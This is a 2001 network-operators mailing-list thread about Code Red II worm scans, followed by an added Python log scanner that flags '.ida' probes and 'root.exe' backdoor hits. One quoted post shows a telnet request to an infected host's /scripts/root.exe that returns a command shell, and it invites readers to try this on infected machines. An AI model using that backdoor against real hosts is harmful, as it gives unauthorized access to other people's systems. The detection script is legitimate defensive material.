Hi all, I have looked on our router and am seeing up to 100 attempts per minute from the Code Red Vers. II virus scanning our network looking for other machines to infect. Is anyone else seeing such a high scan rate? Can anything be done about it? Over the last 3 hours, the frequency of attempts increased by 50%.

At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote:
> On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:
>
> > It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no Windows machines anywhere near, you might have a rather boring night.
>
> Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:
>
> cw:0(a)weta(cw)$ telnet x.x.x.x 80
> Trying x.x.x.x...
> Connected to x.x.x.x.
> Escape character is '^]'.
> get /scripts/root.exe HTTP/0.9
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Sun, 05 Aug 2001 11:39:46 GMT
> Content-Type: application/octet-stream
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
>
> c:\inetpub\scripts>
>
> Cool :)
>
> Start grepping those proxy logs, people, for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).
>
> --cw
>
> ---------
> To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz
> where the body of your message reads: unsubscribe nznog
Matt Law
Network Engineer
Voyager NZ Ltd
DDI +649 4439 443
PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc
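Added example (not from any poster in this thread): the log check Chris suggests, written out in Python. It parses Common Log Format lines from a web server or proxy, flags requests for the `/scripts/root.exe` backdoor shown in the transcript above and for `/default.ida?...` (the .ida ISAPI probe the Code Red family spread through; that signature comes from general knowledge of the worm, not from this thread), and reports per-source hit counts plus the peak hits per minute, so the scan rate Matt describes can be measured per source address. The log lines are constructed sample data; the addresses are private or documentation ranges, not real hosts.

```python
"""Flag Code Red style probes in web or proxy access logs.

Added example for the nznog thread above; not code from any of the posters.
Signatures checked:
  - requests for root.exe (the /scripts/root.exe backdoor shown in the thread)
  - requests for /default.ida?... (the .ida overflow probe the Code Red
    family propagated through; assumed signature, not quoted in the thread)
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample access-log lines in Common Log Format. Addresses are
# from private/documentation ranges; the requests mimic what the thread
# describes. 10.0.0.5 behaves like an infected box scanning a neighbour.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2001:23:39:46 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287
10.0.0.5 - - [05/Aug/2001:23:39:47 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287
10.0.0.5 - - [05/Aug/2001:23:39:59 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287
10.0.0.5 - - [05/Aug/2001:23:40:03 +1200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 287
192.0.2.10 - - [05/Aug/2001:23:41:12 +1200] "GET /scripts/root.exe HTTP/1.0" 200 1034
198.51.100.7 - - [05/Aug/2001:23:41:30 +1200] "GET /index.html HTTP/1.1" 200 5120
"""

# Common Log Format: host ident user [time] "method path proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3}) \S+'
)


def parse_clf(line):
    """Return the fields of one CLF line as a dict, or None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Map a request path to an indicator tag, or None for ordinary traffic."""
    lower = path.lower()
    if lower.startswith("/default.ida"):
        return "ida-overflow-probe"
    if "root.exe" in lower:
        return "root.exe-backdoor-access"
    return None


def analyse(log_text):
    """Scan log text; return flagged hits, per-source counts and peak hits/minute.

    The source host is the interesting field: a probe comes from an already
    infected machine, whatever the status code the target returned.
    """
    hits = []
    per_source = Counter()
    per_minute = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        tag = classify(rec["path"])
        if tag is None:
            continue
        hits.append((rec["host"], rec["when"], tag, rec["status"]))
        per_source[rec["host"]] += 1
        per_minute[rec["host"]][rec["when"].replace(second=0)] += 1
    peak = {host: max(buckets.values()) for host, buckets in per_minute.items()}
    return {"hits": hits, "per_source": per_source, "peak_per_minute": peak}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for host, count in report["per_source"].most_common():
        print(f"{host:16} hits={count:4} peak/min={report['peak_per_minute'][host]}")
```

A 404 against `/default.ida` on a box that is not running IIS is still a useful line: the target was unaffected, but the source address is an infected machine, which is how you locate the cracked customer boxes Perry refers to. Run it against real logs by feeding the file contents to `analyse()` instead of `SAMPLE_LOG`.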